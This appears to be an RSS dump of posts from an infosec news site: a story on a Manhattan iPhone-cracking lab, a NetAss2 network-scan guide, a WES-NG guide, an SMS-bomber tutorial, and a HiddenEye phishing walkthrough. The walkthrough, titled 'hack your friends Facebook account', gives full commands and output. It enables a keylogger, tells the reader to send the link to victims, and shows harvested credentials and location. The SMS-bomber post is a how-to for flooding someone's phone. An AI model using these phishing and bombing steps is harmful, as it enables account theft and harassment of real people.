Network Tools – Information Security Newspaper | Hacking News
https://www.securitynewspaper.com
Information Security Newspaper | Infosec Articles | Hacking News
Last build: Fri, 23 Jul 2021 19:56:12 +0000

New York has an electronic prison for hacking iPhones
https://www.securitynewspaper.com/2020/01/23/new-york-has-an-electronic-prison-for-hacking-iphones/
Fri, 24 Jan 2020 00:17:29 +0000

The post New York has an electronic prison for hacking iPhones appeared first on Information Security Newspaper | Hacking News.

The controversy over the use of encryption in iOS and Android smart devices was recently rekindled. On one side, Apple and Google argue that encryption is the main tool for protecting users’ data, while government agencies claim that implementing a way to access these devices would represent a major step forward in combating criminal activity.

With the release of iOS 8, Apple began implementing encryption on all of its products to protect users, who were too exposed to malicious hacking activity. Google implemented an identical measure soon after. Since then, something of a race has developed between US government agents trying to obtain information from these devices and the developer companies, which keep implementing increasingly stringent security measures.

The dispute between the US government and these companies is far from over; meanwhile, law enforcement agencies have found a third way to bypass encryption on these devices without violating data protection legislation. Cyrus Vance Jr., Manhattan district attorney, and the city’s Cybercrime Unit created a kind of prison for a specific purpose: extracting information stored on some smart devices using brute force tactics before their owners delete data that could be useful in criminal investigations.

Cyrus Vance Jr., Manhattan District Attorney
SOURCE: Fast Company

The entrance to this “prison” resembles that of a bunker. The installation consists of a radio frequency isolation chamber protected behind two hermetically sealed steel doors. Connected along the walls of this chamber are dozens of Apple devices (iPad/iPhone) confiscated during the commission of crimes currently under investigation.

Entrance to the laboratory facilities
SOURCE: Fast Company

All devices in these facilities are connected to a set of computers with massive processing power, dedicated to generating random number sequences in an attempt to decrypt the access codes of the confiscated devices. Researchers working here can even take advantage of other systems that are idle at night to create a local supercomputer network, according to a report in the business magazine Fast Company.

During the interview, Steve Moran, director of the High Technology Analysis Unit, shows as an example of the lab’s work an iPhone on which more than 10k possible combinations have been tested: “This would have been enough to decrypt a four-digit password. However, Apple has been using six-digit access codes for the last five years, which requires a million possible combinations to be tested,” he said.

Steve Moran, Director of the High Technology Analysis Unit
SOURCE: Fast Company

In addition, data protection specialists point out that Apple restricts the number of times per minute an access code can be entered; this is where the investigators of these crimes come in. “It is required to think about possible combinations. We need to know some facts: date of birth, wedding anniversary, birthday of wives or children, even the number of a favorite baseball player can be helpful in reducing the number of attempts needed to unlock the devices of the suspects,” adds Moran.

This is not the only variable that affects the lab’s operations: in addition to the huge number of combinations to test, researchers must also prioritize specific devices. To address this, Moran designed a workflow that evaluates the most urgent cases; there are currently more than 3,000 low-priority devices held in these facilities.

Just another day of work in the lab
SOURCE: Fast Company

As already mentioned, Apple and Google’s main argument for encryption is data protection, a position entirely justified considering that these companies cover almost 99% of the global smartphone market.

While the companies claim that no one, not even their internal staff, can access an encrypted device, prosecutor Vance believes it highly likely that Apple has some kind of secret backdoor. “Apple accesses our devices all the time: OS updates, SMS messages, external links, it’s all part of that invasive practice.” Despite these claims, shared by a considerable number of experts on the subject, the user privacy argument has prevailed over the demand for access to these files.

Privacy is at the heart of the latest iPhone marketing campaign
SOURCE: Apple

On the other hand, Vance considers that the request to remove encryption is neither exaggerated nor unfounded, as there are cases where information stored on smart devices recovered at crime scenes or in raids has been instrumental in solving complex cases. One example is the arrest and conviction of Lamar Davenport for the murder of E’Dena Hines, granddaughter of actor Morgan Freeman. The prosecutor in charge of the case presented as evidence a video found on the defendant’s iPhone after months of work to gain access to the device. “Not only that; thanks to the activity of this laboratory we have found useful information to prove the innocence of at least 16 suspects in various crimes,” he adds.

Vance’s anti-encryption campaign has not been limited to his local environment. The prosecutor has met on several occasions with members of Europol and Interpol, has published articles in all kinds of magazines, and has tried to establish contact with representatives of the technology companies.

The International Institute of Cyber Security (IICS) points out that, before 2014, technology companies seemed to have no problem cooperating with law enforcement agencies, even noting that Apple’s collaboration was considered outstanding and effective. However, this cooperative work came to a breaking point after Edward Snowden’s revelations about the US National Security Agency’s espionage activity. While all of the tech companies mentioned by Snowden denied collaborating with the US government, Apple opted for a more vigorous demonstration of privacy engagement, launching the iOS 8 system, which included full encryption for the first time.

This laboratory is one of the main tools for the investigation of criminal cases in the city, as it has the most complex hardware resources available, in addition to specially developed software to apply brute force to these devices. However, with the emergence of new versions of mobile operating systems, the work of these researchers becomes increasingly complex. “At the beginning of this project, only 52% of the smartphones analyzed were locked, while the number of locked devices is currently 82%,” Moran says, so government agencies are also betting that legislation on mobile device encryption will streamline this work.

How to do penetration testing of your network – Step by Step Guide
https://www.securitynewspaper.com/2019/11/21/how-to-do-penetration-testing-of-your-network-step-by-step-guide/
Fri, 22 Nov 2019 03:51:39 +0000

The post How to do penetration testing of your network – Step by Step Guide appeared first on Information Security Newspaper | Hacking News.

Network pentesting helps pentesters and network administrators find vulnerabilities in a particular system. Network pentesting is done to secure the network: it tests the local network and helps find network vulnerabilities. According to the ethical hacking researcher of the International Institute of Cyber Security, if an attacker compromises any one system on an organization’s local network, the attacker can use further methods to penetrate the rest of the local network.

Network Pentesting Methodology

Network pentesting should be done regularly to secure corporate networks. The network pentesting methodology is outlined below.

  • Information Gathering – This phase consists of service enumeration: open ports and services are scanned, mostly to find vulnerabilities. The hosts discovered in the scanning phase are the prime source for finding unpatched systems. Many companies use Wi-Fi printers, which are among the most common targets for attack. In this phase pentesters try to find as much information as possible; it is the most important phase, because the information collected here is used to find vulnerabilities. Netass2 is helpful for finding open ports and services on the discovered hosts.
  • Threat Modeling – Here automated scanners are used on the information collected in the previous phase. Threat modeling identifies assets and divides them into threat categories. These might consist of password hashes, missing security updates, or outdated firewall policies that help an attacker enter the network using MITM methods.
  • Vulnerability Analysis – This phase involves analysis of the vulnerabilities found, using various security tools and manual testing. Many vulnerabilities have to be analyzed here, and the attack plan is designed in this phase.
  • Exploitation – This phase involves actually attacking the vulnerabilities found; it includes intensive attacks on the vulnerabilities.
  • Reporting – This phase reports all the vulnerabilities found in a proper reporting format. It needs to be written and verified carefully, as it includes all the details of the vulnerabilities and shows the value of our services.

Netass2 (Network Assessment Assistance Framework) is used to scan the local network in the information gathering phase. Netass2 uses nmap and zenmap modules for scanning the given hosts.

  • For testing we will use Kali Linux 2018.2 amd64. Open a terminal and type git clone https://github.com/zerobyte-id/NetAss2.git
  • Type cd NetAss2
  • Type ls
  • Type chmod 755 install.bash netass2.bash
  • Type ./netass2.bash
root@kali:/home/iicybersecurity/Downloads/NetAss2# ./netass2.bash
 ------------------------------------------
 | NAME  : Network Assessment Assistance  |
 | ALIAS : NetAss2                        |
 | TYPE  : VA Framework                   |
 | VERS  : 0.1-RC                         |
 | LICEN : GPL v3                         |
 | LINK  : github.com/zerobyte-id/NetAss2 |
 ------------------------------------------
  • Enter project name – project02
Enter a project name: project02
  • Select option 1 (HOST DISCOVERY) and enter the network subnet. To find your network subnet, run ipconfig and check the IP address and subnet mask in the output. Then enter the subnet as shown below.
  • Type 192.168.1.1/24
   --------------------------------------------------

      __     _     _           ____
   /\ \ \___| |_  / \  ___ ___|___ \
  /  \/ / _ \ __|/ O \/ __/ __| __) |
 / /\  /  __/ |_/  _  \__ \__ \/ __/
 \_\ \/ \___|\__\_/ \_/___/___/_____\
     Network Assessment Assistance

 [1]. HOST DISCOVERY
 [2]. PORT SCAN ON SINGLE HOST
 [3]. MASSIVE PORT SCAN VIA DISCOVERED HOSTS
 [4]. MASSIVE PORT SCAN VIA LIST ON FILE
 [5]. SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
 [6]. MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
 [!]. SHOW REPORTS
 [0]. EXIT

 INPUT: 1

 ----------------[ HOST DISCOVERY ]----------------

 NOTE: Your network block reminder
  + 192.168.1.102/24

 NOTE: Enter the network block that you want to scan
 NOTE: Example: 192.168.1.0/24
INPUT: 192.168.1.1/24
 INFO: Nmap run...
 INFO: Discovering host...

 Host
 ------------
 192.168.1.1
 192.168.1.12
 192.168.1.102
 192.168.1.103

 --------------------------------------------------
  • The output above lists the hosts discovered on the network. To find the open ports on a single host, type 2
 --------------------------------------------------

      __     _     _           ____
   /\ \ \___| |_  / \  ___ ___|___ \
  /  \/ / _ \ __|/ O \/ __/ __| __) |
 / /\  /  __/ |_/  _  \__ \__ \/ __/
 \_\ \/ \___|\__\_/ \_/___/___/_____\
     Network Assessment Assistance

 [1]. HOST DISCOVERY
 [2]. PORT SCAN ON SINGLE HOST
 [3]. MASSIVE PORT SCAN VIA DISCOVERED HOSTS
 [4]. MASSIVE PORT SCAN VIA LIST ON FILE
 [5]. SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
 [6]. MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
 [!]. SHOW REPORTS
 [0]. EXIT
INPUT: 2
  -----------[ PORT SCAN ON SINGLE HOST ]-----------
  INFO: Discovered host
  192.168.1.1
  192.168.1.12
  192.168.1.102
  192.168.1.103
  NOTE: Enter the specific host that you want to scan
  NOTE: Example: 192.168.1.100
  INPUT: 192.168.1.103
  INFO: Nmap run…
  INFO: Discovering port on 192.168.1.103…
  IP Addr        Port      Service          Vendor
  -------        ----      -------          ------
  192.168.1.103  135/tcp   msrpc            Microsoft Windows RPC
  192.168.1.103  139/tcp   netbios-ssn      Microsoft Windows netbios-ssn
  192.168.1.103  445/tcp   microsoft-ds?
  192.168.1.103  902/tcp   ssl/vmware-auth  VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
  192.168.1.103  912/tcp   vmware-auth      VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
  192.168.1.103  1536/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1537/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1538/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1539/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1540/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1541/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1545/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1569/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  3389/tcp  ms-wbt-server    Microsoft Terminal Services 
  • The output above shows the open ports on the host, which indicate that the target may be exposed to various Windows vulnerabilities. Netass2 is used in network pentesting for exactly this kind of enumeration.
  • To scan all discovered hosts at once, type 3
--------------------------------------------------
      __     _     _           ____
   /\ \ \___| |_  / \  ___ ___|___ \
  /  \/ / _ \ __|/ O \/ __/ __| __) |
 / /\  /  __/ |_/  _  \__ \__ \/ __/
 \_\ \/ \___|\__\_/ \_/___/___/_____\
     Network Assessment Assistance

 [1]. HOST DISCOVERY
 [2]. PORT SCAN ON SINGLE HOST
 [3]. MASSIVE PORT SCAN VIA DISCOVERED HOSTS
 [4]. MASSIVE PORT SCAN VIA LIST ON FILE
 [5]. SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
 [6]. MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
 [!]. SHOW REPORTS
 [0]. EXIT
INPUT: 3
 ----[ MASSIVE PORT SCAN VIA DISCOVERED HOSTS ]----

 INFO: Nmap run...
 INFO: Discovering port on 192.168.1.1...
 INFO: Nmap run...
 INFO: Discovering port on 192.168.1.12...
 INFO: Nmap run...
 INFO: Discovering port on 192.168.1.102...
 INFO: Nmap run...
 INFO: Discovering port on 192.168.1.103...

 IP Addr        Port       Service          Vendor
 -------        ----       -------          ------
 192.168.1.1    21/tcp     ftp              Netgear broadband router or ZyXel VoIP adapter ftpd 1.0
 192.168.1.1    23/tcp     telnet           Netgear broadband router or ZyXel VoIP adapter telnetd
 192.168.1.1    80/tcp     upnp
 192.168.1.1    7547/tcp   upnp
 192.168.1.12   135/tcp    msrpc            Microsoft Windows RPC
 192.168.1.12   139/tcp    netbios-ssn      Microsoft Windows netbios-ssn
 192.168.1.12   445/tcp    microsoft-ds     Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
 192.168.1.12   554/tcp    rtsp?
 192.168.1.12   2869/tcp   http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 192.168.1.12   3389/tcp   ms-wbt-server    Microsoft Terminal Service
 192.168.1.12   3389/tcp   ms-wbt-server?
 192.168.1.12   5357/tcp   http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 192.168.1.12   10243/tcp  http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 192.168.1.12   49152/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49153/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49154/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49155/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49156/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49157/tcp  msrpc            Microsoft Windows RPC
 192.168.1.102  22/tcp     ssh              OpenSSH 7.6p1 Debian 4 (protocol 2.0)
 192.168.1.103  135/tcp    msrpc            Microsoft Windows RPC
 192.168.1.103  139/tcp    netbios-ssn      Microsoft Windows netbios-ssn
 192.168.1.103  445/tcp    microsoft-ds?
 192.168.1.103  902/tcp    ssl/vmware-auth  VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
 192.168.1.103  912/tcp    vmware-auth      VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
 192.168.1.103  1536/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1537/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1538/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1539/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1540/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1541/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1545/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1569/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  3389/tcp   ms-wbt-server    Microsoft Terminal Services

 --------------------------------------------------
  • The output above shows the open ports of all hosts discovered on the local network. Network pentesting reveals open ports and services, which are then used in the later attack phases.
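To turn the scan table NetAss2 prints into something a defender can act on, here is an added Python helper (not part of NetAss2 or the original article) that parses the "IP Addr / Port / Service / Vendor" rows and flags services that merit review first, such as telnet, FTP, SMB and RDP exposed on the LAN. The sample rows are copied from the scan output above; the severity labels and reasons are this example's own assumptions, not NetAss2 output.

```python
"""Triage helper for the port-scan table NetAss2 prints after an nmap run."""
import re
from collections import defaultdict

# Sample table: all rows copied from the NetAss2 scan output in the article.
SAMPLE_SCAN = """\
 IP Addr        Port       Service          Vendor
 -------        ----       -------          ------
 192.168.1.1    21/tcp     ftp              Netgear broadband router or ZyXel VoIP adapter ftpd 1.0
 192.168.1.1    23/tcp     telnet           Netgear broadband router or ZyXel VoIP adapter telnetd
 192.168.1.1    80/tcp     upnp
 192.168.1.12   445/tcp    microsoft-ds     Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
 192.168.1.12   3389/tcp   ms-wbt-server    Microsoft Terminal Service
 192.168.1.102  22/tcp     ssh              OpenSSH 7.6p1 Debian 4 (protocol 2.0)
 192.168.1.103  445/tcp    microsoft-ds?
"""

# Services whose mere exposure on a LAN is worth a finding, with a reason.
# Severity labels are this example's own triage assumptions.
RISKY_SERVICES = {
    "telnet": ("high", "clear-text remote administration"),
    "ftp": ("medium", "clear-text file transfer, often allows anonymous login"),
    "microsoft-ds": ("medium", "SMB exposed; verify SMBv1 is disabled and shares are restricted"),
    "ms-wbt-server": ("medium", "RDP exposed; require NLA/MFA and restrict source networks"),
    "upnp": ("low", "UPnP on a gateway can open ports without authentication"),
}

# One table row: IP, port/proto, service name, optional vendor text.
ROW_RE = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<service>\S+)"
    r"(?:\s+(?P<vendor>.*\S))?\s*$"
)


def parse_scan(text):
    """Return one dict per table row; header, separator and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["port"] = int(d["port"])
        # nmap marks an unconfirmed service guess with a trailing '?'
        d["guessed"] = d["service"].endswith("?")
        d["service"] = d["service"].rstrip("?")
        d["vendor"] = d["vendor"] or ""
        rows.append(d)
    return rows


def triage(rows):
    """Map each host to its flagged services as (severity, port, proto, service, reason)."""
    order = {"high": 0, "medium": 1, "low": 2}
    findings = defaultdict(list)
    for r in rows:
        if r["service"] in RISKY_SERVICES:
            sev, why = RISKY_SERVICES[r["service"]]
            findings[r["ip"]].append((sev, r["port"], r["proto"], r["service"], why))
    for ip in findings:
        findings[ip].sort(key=lambda f: (order[f[0]], f[1]))
    return dict(findings)


def report(findings):
    """Render findings as plain text, hosts in numeric IP order."""
    lines = []
    for ip in sorted(findings, key=lambda s: tuple(int(o) for o in s.split("."))):
        for sev, port, proto, svc, why in findings[ip]:
            lines.append(f"{ip:<15} {port:>5}/{proto} {svc:<14} [{sev}] {why}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(triage(parse_scan(SAMPLE_SCAN))))
```

The same parser works on the single-host table from option 2, since the column layout is identical.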

Other Types of Network-Level Attacks

Several network-level attacks occurred last year, and there are many kinds of them; new cases of network attacks appear day after day. Companies lose a lot of money because of such cyber attacks, as commented by an ethical hacking expert of the International Institute of Cyber Security.

  • Browser Attacks – These are the most common type of network attack. As explained above, the attacker tries to find vulnerabilities in hosts running on the local network, and then tries to breach security through the browser, the most common utility used to access the internet.
  • Brute Force Attacks – Such attacks use large wordlists, or a dictionary built by gathering information about the target. Attacks that rely on installing malware can take longer to compromise a machine, because the victim has to click on the malware.
  • DoS (Denial of Service) Attacks – Multiple packets are sent to a particular port to interrupt the service of a running server or website. DoS attacks are very common, and not many companies are able to recover their resources.
  • Malware Attacks – Such attacks use a piece of malware, in the form of a Windows executable or software for another OS, to create a reverse session from the victim’s computer. Malware attacks are very serious, as they give the attacker full permission to access the victim’s computer.

Fake text message attack. How Prank or hack your Friends with fake SMS Bomber
https://www.securitynewspaper.com/2019/09/02/how-prank-or-hack-your-friends-with-fake-sms-bomber/
Mon, 02 Sep 2019 14:40:24 +0000

The post Fake text message attack. How Prank or hack your Friends with fake SMS Bomber appeared first on Information Security Newspaper | Hacking News.

Fake texts, fake SMS or fake messages are among the biggest threats the industry is facing. All applications require an account to keep your settings and app usage. When registering through an application, it generally requires a mobile number and returns an OTP (One Time Password). You may have received unnecessary OTPs from different senders many times. Attackers and spammers often use SMS bombing techniques to irritate or disturb their targets.

SMS bombing is a technique of sending fake messages to any mobile number. SMS bombing uses a script containing SMS gateway APIs, drawn from different SMS gateways. According to the ethical hacking researcher of the International Institute of Cyber Security, SMS bombers utilize different gateways. SMS gateway providers offer services for forwarding, routing and storing incoming messages; to send messages, the SMS gateway connects to SMSC centers.

Some popular SMS gateways are:

  • You can also check free APIs that can be used in SMS bomber scripts at https://rapidapi.com/
  • Nexmo SMS Messaging
  • Twilio SMS
  • TeleSign
  • D7SMS
  • Telnyx
  • MessageBird
  • Click Send (IntelTech)

SMS Bomber Application:

  • There are different tools used in SMS bombing. BombitUP is one application used for SMS bombing.
  • Download the application: https://www.bombitup.net/
  • Download and install BOMBitUP_v4.03.1.apk
  • Enter the target mobile number and then the number of messages you want to send.
  • Click on BOMBIT
  • You can also set a delay in seconds; the default is 2.5 seconds.
  • Delivery depends on the BombitUP server, but most of the time messages are sent on time.
  • Click on Bombit
  • The screenshot above shows that 10 messages have been sent. Below are the received messages.
  • Above you can see the messages received on the target number.

You can check out the SMS Bomber practical (video):

As per the ethical hacking researcher of the International Institute of Cyber Security, there are many more ways to send fake SMS or fake messages for social engineering attacks.

Hack your friends Facebook account using HiddenEye
https://www.securitynewspaper.com/2019/08/02/hack-your-friends-facebook-account-using-hiddeneye/
Fri, 02 Aug 2019 15:16:49 +0000

The post Hack your friends Facebook account using HiddenEye appeared first on Information Security Newspaper | Hacking News.

Phishing is the attack most victims fall for, through fake pages. There are many methods for creating fake pages. Phishing is a way to obtain login credentials such as usernames and passwords, or other confidential details, by creating cloned copies of original web pages. According to the ethical hacking researcher of the International Institute of Cyber Security, most attacks are carried out using phishing techniques.

Phishing is still the most popular cyber attack among attackers and spammers. We will show a phishing tool written in Python: HiddenEye, a modern phishing tool that supports a wide variety of social networks.

  • For testing we will use Ubuntu 16.04.3 LTS 64 Bit. Install python3, php7 and wget. For that, type sudo apt-get update && sudo apt-get install python3, sudo apt-get install python-pip3, sudo apt-get install wget.
  • After installing the above requirements, type git clone https://github.com/DarkSecDevelopers/HiddenEye.git
  • Then type cd HiddenEye && ls
  • Type pip3 install -r requirements.txt
  • Type python3 HiddenEye.py
  • Type y
HURRAY!! Internet is available.. We can Continue
 PHP INSTALLATION FOUND
 [*] HiddenEye is Opening. Please Wait…100%
 [!] Do you agree to use this tool for educational purposes only? (y/n)
 HiddenEye >>> y
  • Type 1

  ██   ██ ██ ██████   ██████   ███████ ███   ██  ███████ ██    ██ ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ████  ██  ██       ██  ██  ██
  ███████ ██ ██    ██ ██    ██ ███████ ██ ██ ██  ███████   ████   ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ██  ████  ██         ██    ██
  ██   ██ ██ ██████   ██████   ███████ ██   ███  ███████    ██    ███████

                                                     v0.2.7 BY:DARKSEC
             [ Modern Phishing Tool With Advanced Functionality ]
[ PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------
SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:
------------------------
 [1] Facebook        [10] Yahoo          [19] Pinterest      [28] DropBox
 [2] Google          [11] Twitch         [20] ProtonMail     [29] eBay
 [3] LinkedIn        [12] Microsoft      [21] Spotify        [30] MySpace
 [4] GitHub          [13] Steam          [22] Quora          [31] PayPal
 [5] StackOverflow   [14] VK             [23] PornHub        [32] Shopify
 [6] WordPress       [15] iCloud         [24] Adobe          [33] Verizon
 [7] Twitter         [16] GitLab         [25] Badoo          [34] Yandex
 [8] Instagram       [17] Netflix        [26] CryptoCurrency [35] Reddit
 [9] Snapchat        [18] Origin         [27] DevianArt
HiddenEye >>>
  • Type 3
 [*] SELECT ANY ONE MODE…
 Operation mode:
  [1] Standard Page Phishing
  [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)
  [3] Facebook Phishing- Fake Security issue(security_mode)
  [4] Facebook Phising-Messenger Credentials(messenger_mode)
 HiddenEye >>> 3
  • Type Y
        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY: DARKSEC **
-------------------------------
[ KEYLOGGER PROMPT ]!!
-------------------------------
[*]DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-(Y/N)
 YOUR CHOICE >>> Y
  • Type www.facebook.com
        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY:DARKSEC **

-------------------------------
[ PUT YOUR REDIRECTING URL HERE ]
-------------------------------
**(Choose Wisely As Your Victim Will Redirect to This Link)

**(Do not leave it blank. Unless Errors may occur)

[*]Insert a custom redirect url:

REDIRECT HERE>>> www.facebook.com
  • Type 443
[ WEBSERVER PORT SELECTION ]!!
 [*]Select Any Available Port [1-65535]:
 HiddenEye >>> 443
  • Type 2
[ HOST SERVER SELECTION ]!!
[!](SERVEO WORKS BETTER)
[*]Select Any Available Server:
[1]Ngrok
[2]Serveo
 HiddenEye >>> 2
  • Type 2
[ SERVEO URL TYPE SELECTION ]!!
 [!]REMEMBER ? Serveo Don't Allows Phishing.
 [!]They Drops The Connection Whenever Detects Phishing.
 [*]CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK:
 [1]Custom URL (Generates designed url)
 [2]Random URL (Generates Random url)
 YOUR CHOICE >>> 2

 [ RANDOM SERVEO URL ]!!
 [!] SEND THIS SERVEO URL TO VICTIMS-
 [] Localhost URL: https://127.0.0.1:443 
 [] SERVEO URL: https://viduo.serveo.net
 ……………………………………………………………….
 [!] IF FOUND SEGMENTATION FAULT, IT MEANS THE SERVER FAILED.            |
 [!] THEN YOU HAVE TO RUN IT AGAIN.                                      |
 [!] Use This Command In Another Terminal.                               |
 (cd Server/www/ && php -S 127.0.0.1:443 > /dev/null)                   |
 ……………………………………………………………….
 [*] Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim …
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  • Open another terminal and go to the location below: cd /home/iicybersecurity/HiddenEye/Server/www/ && php -S 127.0.0.1:443 > /dev/null
root@ubuntu:/home/iicybersecurity/HiddenEye# cd Server/www/ && php -S 127.0.0.1:443 > /dev/null
[Fri Aug 2 03:55:35 2019] 127.0.0.1:37156 [200]: /keylogger.php?c=
[Fri Aug 2 03:55:36 2019] 127.0.0.1:37158 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:37 2019] 127.0.0.1:37160 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:38 2019] 127.0.0.1:37162 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:39 2019] 127.0.0.1:37164 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:40 2019] 127.0.0.1:37166 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:41 2019] 127.0.0.1:37168 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:42 2019] 127.0.0.1:37170 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:43 2019] 127.0.0.1:37172 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:44 2019] 127.0.0.1:37174 [200]: /keylogger.php?c= 
  • When you open https://127.0.0.1:443 in your web browser, you will see the victim interaction in the terminal where you started the server.
  • Enter a username and password.
  • To send the fake page to your friends, you can send them a fake email containing the public URL generated, in this case https://viduo.serveo.net. You can also test using the loopback URL on the Ubuntu machine, https://127.0.0.1:443
  • After entering the username and password, you will find the login credentials in the terminal where you started HiddenEye.py
…………………………………………………………
  [ CREDENTIALS FOUND ]:
 …………………………………………………………
[EMAIL]; meetmichael@gmail.com [PASS]: michael@12345
 …………………………………………………………
 [ VICTIM INFO FOUND ]:
  Victim Public IP: 220.59.157.158
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
 Current logged in user: root
 Longitude: 79.0005 
 Latitude: 22.6000
 ISP: AS17813 
 Country: IN
 Region: Delhi 
 City: Delhi
 …………………………………………………………
 ………………………….
 ………………………….

All-New Windows Exploit Suggester is here, WES-NG
https://www.securitynewspaper.com/2019/07/25/windows-exploit-suggester-is-here/
Thu, 25 Jul 2019 19:55:36 +0000

The post All-New Windows Exploit Suggester is here, WES-NG appeared first on Information Security Newspaper | Hacking News.

Windows is the most popular operating system because of its ease of use and easily understood features. Its wide usage also makes it a bigger target; according to an ethical hacking researcher of the International Institute of Cyber Security, Windows has many vulnerabilities, which raises the question of whether Windows is secure or not. Today we will show a Python script designed to find such vulnerabilities.

WES-NG, the Windows Exploit Suggester, is a tool based on the output of the Windows systeminfo utility. It provides a list of vulnerabilities, including exploits, for the Windows OS. All Windows versions, including Windows Server versions, are supported.

  • For testing we will use Windows 10 1809 64-bit. Make sure that Python 3 is configured on Windows.
  • To install Python go to: https://www.python.org/downloads/
  • After downloading, install Python for all users. If the Python path is not set automatically, set the path in the Windows environment variables.
  • Go to My Computer > Properties > Advanced > Environment Variables > System Variables
  • Click on New, type Path as the variable name and enter the value C:\Program Files (x86)\Python37-32\Scripts\
  • Type python --version to verify the installation.
  • After configuring Python, download WES-NG from: https://github.com/bitsadmin/wesng
  • After downloading, unzip WES-NG. Then open CMD (Command Prompt) as administrator.
  • Go to the location where you downloaded & unzipped WES-NG.
  • Then open another CMD as administrator & gather the system configuration. For that, type systeminfo.exe
[screenshot: systeminfo.exe output]
  • Copy the system info into a text file: type systeminfo > systeminfo.txt
  • A new text file will be created. Copy systeminfo.txt into the wesng-master folder.
  • Then execute wes.py systeminfo.txt
  • Now WES-NG will start finding vulnerabilities on the basis of the system information.
[screenshots: wes.py output listing the vulnerabilities found]
  • The screenshots above show 116 vulnerabilities for Windows 10 1809. We have posted some of them to show how the tool works. These types of tools are quite often used by ethical hacking researchers.
  • If you open any vulnerability, for example the last one, CVE-2019-1081, you can see that WES-NG finds vulnerabilities from CVE & exploit-db.
  • The entry above shows a disclosure vulnerability in which Microsoft browsers improperly handle objects in memory.
  • WES-NG updates its list of definitions from https://raw.githubusercontent.com/bitsadmin/wesng/master/definitions.zip to show the list of CVEs and exploits for the given operating system.
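As an added example (not part of WES-NG or of the original post), the following Python script pulls out of a saved systeminfo.txt the fields a systeminfo-based checker keys on, namely OS name, version and build, architecture and the installed hotfix (KB) list, and then matches them against a small advisory table. The systeminfo dump, the advisory table and its CVE-EXAMPLE ids and KB numbers are all constructed placeholders, and the matching ignores KB supersedence, which WES-NG's real definitions handle.

```python
import re

# Constructed sample of `systeminfo > systeminfo.txt` output (trimmed, not a real host).
SAMPLE_SYSTEMINFO = """\
Host Name:                 DESKTOP-EXAMPLE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
Original Install Date:     7/1/2019, 10:00:00 AM
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4000001
                           [02]: KB4000002
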